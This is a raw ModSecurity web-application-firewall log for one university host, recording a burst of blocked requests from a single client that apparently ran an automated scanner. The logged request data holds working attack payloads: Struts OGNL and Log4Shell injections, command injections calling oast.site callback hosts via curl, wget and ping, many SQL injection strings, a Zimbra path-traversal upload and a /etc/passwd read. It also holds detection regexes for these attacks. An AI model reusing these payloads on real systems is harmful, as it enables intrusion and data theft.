[Tue Aug 29 11:33:53.304534 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sondata[ip]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:sondata[ip]: a|curl cjmn8l5jmimk2adbbnlgdft38pesrdgmr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/php/ping.php"] [unique_id "ZO11McCo-f0AAAR@KJ0AAAAF"]
[Tue Aug 29 11:33:53.339347 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccessib [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11McCo-f0AAARjjTQAAAAL"]
[Tue Aug 29 11:33:53.340320 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:login: ${jndi:ldap://${:-594}${:-752}.${hostName}.postdata.cjmn8l5jmimk2adbbnlghyngyoj6hpdh6.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/zdm/cxf/login"] [unique_id "ZO11McCo-f0AAARQ4EQAAAAB"]
[Tue Aug 29 11:33:54.339792 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:account. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:account: admin' and  updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/zentao/user-login.html"] [unique_id "ZO11MsCo-f0AAARjjTkAAAAL"]
[Tue Aug 29 11:33:54.400471 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11MsCo-f0AAARjjTwAAAAL"]
[Tue Aug 29 11:33:55.344099 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirectAction:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com [hostname "mbkm.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11M8Co-f0AAASAHfMAAAAH"]
[Tue Aug 29 11:33:55.440465 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAARQ4FAAAAAB"]
[Tue Aug 29 11:33:57.169295 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "mbkm.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAASHh3gAAAAD"]
[Tue Aug 29 11:33:57.632499 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgwebiyd8811tkc.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NcCo-f0AAASHh4sAAAAD"]
[Tue Aug 29 11:33:58.096948 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASNznMAAAAQ"]
[Tue Aug 29 11:33:59.124827 2023] [:error] [pid 1169] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASRn-MAAAAW"]
[Tue Aug 29 11:33:59.349123 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASUXywAAAAd"]
[Tue Aug 29 11:34:00.364556 2023] [:error] [pid 1164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAASMgd0AAAAO"]
[Tue Aug 29 11:34:01.496822 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-4AAAAG"]
[Tue Aug 29 11:34:03.373665 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlgrt5uf6aygfq66.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAARdiOkAAAAK"]
[Tue Aug 29 11:34:04.386445 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgyaaqtqbycib1s.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAASVoG4AAAAe"]
[Tue Aug 29 11:34:06.418718 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAPLwFYAAAAX"]
[Tue Aug 29 11:34:07.299676 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "mbkm.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAAPLwFcAAAAX"]
[Tue Aug 29 11:34:07.325486 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASNzo0AAAAQ"]
[Tue Aug 29 11:34:08.316847 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAAShCVIAAAAi"]
[Tue Aug 29 11:34:08.340270 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASLqCoAAAAM"]
[Tue Aug 29 11:34:08.368944 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASAHgQAAAAH"]
[Tue Aug 29 11:34:09.330495 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAAShCVYAAAAi"]
[Tue Aug 29 11:34:10.311399 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASK4ekAAAAI"]
[Tue Aug 29 11:34:10.329603 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASfNukAAAAg"]
[Tue Aug 29 11:34:10.353367 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgzxze36cjq63oc.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAAShCVkAAAAi"]
[Tue Aug 29 11:34:11.308844 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASQqAkAAAAT"]
